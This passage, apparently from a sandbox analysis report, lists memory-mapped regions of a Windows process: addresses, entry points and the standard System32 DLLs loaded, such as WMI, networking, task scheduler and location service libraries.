"\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2016 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2017 start_va = 0x7ffa083b0000 end_va = 0x7ffa083cdfff monitored = 0 entry_point = 0x7ffa083b3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2018 start_va = 0x7ffa083d0000 end_va = 0x7ffa08451fff monitored = 0 entry_point = 0x7ffa083d2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2019 start_va = 0x7ffa08460000 end_va = 0x7ffa08475fff monitored = 0 entry_point = 0x7ffa08461af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2020 start_va = 0x7ffa08480000 end_va = 0x7ffa08499fff monitored = 0 entry_point = 0x7ffa08482330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2021 start_va = 0x7ffa088d0000 end_va = 0x7ffa08915fff monitored = 0 entry_point = 0x7ffa088d79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2022 start_va = 0x7ffa08940000 end_va = 0x7ffa0894efff monitored = 0 entry_point = 0x7ffa08944960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2023 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2024 start_va = 0x7ffa08a10000 end_va = 0x7ffa08a4ffff monitored = 0 entry_point = 0x7ffa08a1cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2025 start_va = 0x7ffa08a50000 end_va = 0x7ffa08a96fff monitored = 0 entry_point = 0x7ffa08a51d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2026 start_va = 0x7ffa08ae0000 end_va = 0x7ffa08b21fff monitored = 0 entry_point = 0x7ffa08ae3670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2027 start_va = 0x7ffa08e00000 end_va = 0x7ffa08e1efff monitored = 0 entry_point = 0x7ffa08e037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 2028 start_va = 0x7ffa08e20000 end_va = 0x7ffa08e98fff monitored = 0 entry_point = 0x7ffa08e276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 2029 start_va = 0x7ffa08eb0000 end_va = 0x7ffa08eeffff monitored = 0 entry_point = 0x7ffa08ec6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2030 start_va = 0x7ffa08f10000 end_va = 0x7ffa08f27fff monitored = 0 entry_point = 0x7ffa08f14e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2031 start_va = 0x7ffa08f30000 end_va = 0x7ffa08f54fff monitored = 0 entry_point = 0x7ffa08f35ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2032 start_va = 0x7ffa08f60000 end_va = 0x7ffa090e1fff monitored = 0 entry_point = 0x7ffa08f782a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2033 start_va = 0x7ffa090f0000 end_va = 0x7ffa09192fff monitored = 0 entry_point = 0x7ffa090f2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2034 start_va = 0x7ffa091a0000 end_va = 0x7ffa091f1fff monitored = 0 entry_point = 0x7ffa091a5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2035 start_va = 0x7ffa09200000 end_va = 0x7ffa0922dfff monitored = 1 entry_point = 0x7ffa09202300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2036 start_va = 0x7ffa09230000 end_va = 0x7ffa0928dfff monitored = 0 entry_point = 0x7ffa09235080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2037 start_va = 0x7ffa09290000 end_va = 0x7ffa092affff monitored = 0 entry_point = 0x7ffa09291f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2038 start_va = 0x7ffa092b0000 end_va = 0x7ffa092b8fff monitored = 0 entry_point = 0x7ffa092b18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2039 start_va = 0x7ffa092c0000 end_va = 0x7ffa092d0fff monitored = 0 entry_point = 0x7ffa092c1d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2040 start_va = 0x7ffa09330000 end_va = 0x7ffa09347fff monitored = 0 entry_point = 0x7ffa09332000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2041 start_va = 0x7ffa09350000 end_va = 0x7ffa09390fff monitored = 0 entry_point = 0x7ffa09353750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2042 start_va = 0x7ffa09430000 end_va = 0x7ffa0947bfff monitored = 0 entry_point = 0x7ffa09445310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2043 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2044 start_va = 0x7ffa09510000 end_va = 0x7ffa0954bfff monitored = 0 entry_point = 0x7ffa09516aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2045 start_va = 0x7ffa09c80000 end_va = 0x7ffa09c88fff monitored = 0 entry_point = 0x7ffa09c821d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2046 start_va = 0x7ffa09c90000 end_va = 0x7ffa09cc4fff monitored = 0 entry_point = 0x7ffa09c9a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 2047 start_va = 0x7ffa0a560000 end_va = 0x7ffa0a652fff monitored = 0 entry_point = 0x7ffa0a585d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2048 start_va = 0x7ffa0ac50000 end_va = 0x7ffa0ac59fff monitored = 0 entry_point = 0x7ffa0ac514c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2049 start_va = 0x7ffa0afc0000 end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2050 start_va = 0x7ffa0b050000 end_va = 0x7ffa0b06afff monitored = 0 entry_point = 0x7ffa0b051040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2051 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2052 start_va = 0x7ffa0b320000 end_va = 0x7ffa0b32dfff monitored = 0 entry_point = 0x7ffa0b321460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2053 start_va = 0x7ffa0b330000 end_va = 0x7ffa0b33bfff monitored = 0 entry_point = 0x7ffa0b332830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 2054 start_va = 0x7ffa0b340000 end_va = 0x7ffa0b34ffff monitored = 0 entry_point = 0x7ffa0b341700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2055 start_va = 0x7ffa0b350000 end_va = 0x7ffa0b358fff monitored = 0 entry_point = 0x7ffa0b351ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2056 start_va = 0x7ffa0b360000 end_va = 0x7ffa0b38cfff monitored = 0 entry_point = 0x7ffa0b362290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2057 start_va = 0x7ffa0b390000 end_va = 0x7ffa0b3e1fff monitored = 0 entry_point = 0x7ffa0b3938e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2058 start_va = 0x7ffa0b4a0000 end_va = 0x7ffa0b4b4fff monitored = 0 entry_point = 0x7ffa0b4a3460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2059 start_va = 0x7ffa0b4c0000 end_va = 0x7ffa0b559fff monitored = 0 entry_point = 0x7ffa0b4dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2060 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2061 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2062 start_va = 0x7ffa0b800000 end_va = 0x7ffa0b8bffff monitored = 0 entry_point = 0x7ffa0b82fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2063 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2064 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2065 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2066 start_va = 0x7ffa0bbe0000 end_va = 0x7ffa0bc8dfff monitored = 0 entry_point = 0x7ffa0bbf80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 2067 start_va = 0x7ffa0bc90000 end_va = 0x7ffa0bca1fff monitored = 0 entry_point = 0x7ffa0bc99260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 2068 start_va = 0x7ffa0bcb0000 end_va = 0x7ffa0bd60fff monitored = 0 entry_point = 0x7ffa0bd288b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 2069 start_va = 0x7ffa0bd70000 end_va = 0x7ffa0bd83fff monitored = 0 entry_point = 0x7ffa0bd72d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2070 start_va = 0x7ffa0c070000 end_va = 0x7ffa0c102fff monitored = 0 entry_point = 0x7ffa0c079680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2071 start_va = 0x7ffa0c2b0000 end_va = 0x7ffa0c2d4fff monitored = 0 entry_point = 0x7ffa0c2c2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 2072 start_va = 0x7ffa0c2e0000 end_va = 0x7ffa0c2f0fff monitored = 0 entry_point = 0x7ffa0c2e7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 2073 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2074 start_va = 0x7ffa0ca80000 end_va = 0x7ffa0ca99fff monitored = 0 entry_point = 0x7ffa0ca82cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 2075 start_va = 0x7ffa0ce40000 end_va = 0x7ffa0d1c1fff monitored = 0 entry_point = 0x7ffa0ce91220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2076 start_va = 0x7ffa0e2c0000 end_va = 0x7ffa0e3cdfff monitored = 0 entry_point = 0x7ffa0e30eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 2077 start_va = 0x7ffa0e6d0000 end_va = 0x7ffa0e724fff monitored = 0 entry_point = 0x7ffa0e6d3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2078 start_va = 0x7ffa0e730000 end_va = 0x7ffa0e766fff monitored = 0 entry_point = 0x7ffa0e736020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 2079 start_va = 0x7ffa0e770000 end_va = 0x7ffa0e78ffff monitored = 0 entry_point = 0x7ffa0e7739a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 2080 start_va = 0x7ffa0e790000 end_va = 0x7ffa0e7a6fff monitored = 0 entry_point = 0x7ffa0e795630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2081 start_va = 0x7ffa0e7b0000 end_va = 0x7ffa0e7c2fff monitored = 0 entry_point = 0x7ffa0e7b57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2082 start_va = 0x7ffa0e7d0000 end_va = 0x7ffa0e849fff monitored = 0 entry_point = 0x7ffa0e7f7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2083 start_va = 0x7ffa0e850000 end_va = 0x7ffa0e87dfff monitored = 0 entry_point = 0x7ffa0e857550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2084 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2085 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2086 start_va = 0x7ffa0ead0000 end_va = 0x7ffa0eb10fff monitored = 0 entry_point = 0x7ffa0ead4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2087 start_va = 0x7ffa0eb20000 end_va = 0x7ffa0eb2bfff monitored = 0 entry_point = 0x7ffa0eb214d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 2088 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2089 start_va = 0x7ffa0ec70000 end_va = 0x7ffa0ed55fff monitored = 0 entry_point = 0x7ffa0ec8cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 2090 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2091 start_va = 0x7ffa0ee30000 end_va = 0x7ffa0ee90fff monitored = 0 entry_point = 0x7ffa0ee34b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2092 start_va = 0x7ffa0eea0000 end_va = 0x7ffa0f01bfff monitored = 0 entry_point = 0x7ffa0eef1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 2093 start_va = 0x7ffa0f020000 end_va = 0x7ffa0f02afff monitored = 0 entry_point = 0x7ffa0f021770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 2094 start_va = 0x7ffa0f030000 end_va = 0x7ffa0f06dfff monitored = 0 entry_point = 0x7ffa0f03a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2095 start_va = 0x7ffa0f070000 end_va = 0x7ffa0f096fff monitored = 0 entry_point = 0x7ffa0f073bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2096 start_va = 0x7ffa0f0a0000 end_va = 0x7ffa0f0e9fff monitored = 0 entry_point = 0x7ffa0f0aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2097 start_va = 0x7ffa0f0f0000 end_va = 0x7ffa0f144fff monitored = 0 entry_point = 0x7ffa0f0ffc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2098 start_va = 0x7ffa0f190000 end_va = 0x7ffa0f221fff monitored = 0 entry_point = 0x7ffa0f1da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2099 start_va = 0x7ffa0f2b0000 end_va = 0x7ffa0f2bcfff monitored = 0 entry_point = 0x7ffa0f2b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2100 start_va = 0x7ffa0f2d0000 end_va = 0x7ffa0f2dffff monitored = 0 entry_point = 0x7ffa0f2d2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2101 start_va = 0x7ffa0f2e0000 end_va = 0x7ffa0f2ecfff monitored = 0 entry_point = 0x7ffa0f2e2ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2102 start_va = 0x7ffa0f2f0000 end_va = 0x7ffa0f31efff monitored = 0 entry_point = 0x7ffa0f2f8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 2103 start_va = 0x7ffa0f320000 end_va = 0x7ffa0f33efff monitored = 0 entry_point = 0x7ffa0f324960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2104 start_va = 0x7ffa0f370000 end_va = 0x7ffa0f3ddfff monitored = 0 entry_point = 0x7ffa0f377f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2105 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2106 start_va = 0x7ffa0f430000 end_va = 0x7ffa0f465fff monitored = 0 entry_point = 0x7ffa0f440070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2107 start_va = 0x7ffa0fc30000 end_va = 0x7ffa0fc70fff monitored = 0 entry_point = 0x7ffa0fc47eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2108 start_va = 0x7ffa0fc80000 end_va = 0x7ffa0fd7bfff monitored = 0 entry_point = 0x7ffa0fcb6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2109 start_va = 0x7ffa0fe10000 end_va = 0x7ffa0fecefff monitored = 0 entry_point = 0x7ffa0fe31c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2110 start_va = 0x7ffa0ff20000 end_va = 0x7ffa0ff29fff monitored = 0 entry_point = 0x7ffa0ff21660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2111 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2112 start_va = 0x7ffa0ff50000 end_va = 0x7ffa1009cfff monitored = 0 entry_point = 0x7ffa0ff93da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2113 start_va = 0x7ffa10b10000 end_va = 0x7ffa10b1afff monitored = 0 entry_point = 0x7ffa10b11de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 2114 start_va = 0x7ffa10cc0000 end_va = 0x7ffa11152fff monitored = 0 entry_point = 0x7ffa10ccf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2115 start_va = 0x7ffa11160000 end_va = 0x7ffa111c6fff monitored = 0 entry_point = 0x7ffa1117e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 2116 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2117 start_va = 0x7ffa113b0000 end_va = 0x7ffa113cbfff monitored = 0 entry_point = 0x7ffa113b37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2118 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2119 start_va = 0x7ffa114c0000 end_va = 0x7ffa114c9fff monitored = 0 entry_point = 0x7ffa114c1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2120 start_va = 0x7ffa11560000 end_va = 0x7ffa1157cfff monitored = 0 entry_point = 0x7ffa11564f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 2121 start_va = 0x7ffa11580000 end_va = 0x7ffa115f8fff monitored = 0 entry_point = 0x7ffa1159fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2122 start_va = 0x7ffa11600000 end_va = 0x7ffa11607fff monitored = 0 entry_point = 0x7ffa116013e0 region_type = mapped_file name = "dabapi.dll" filename = 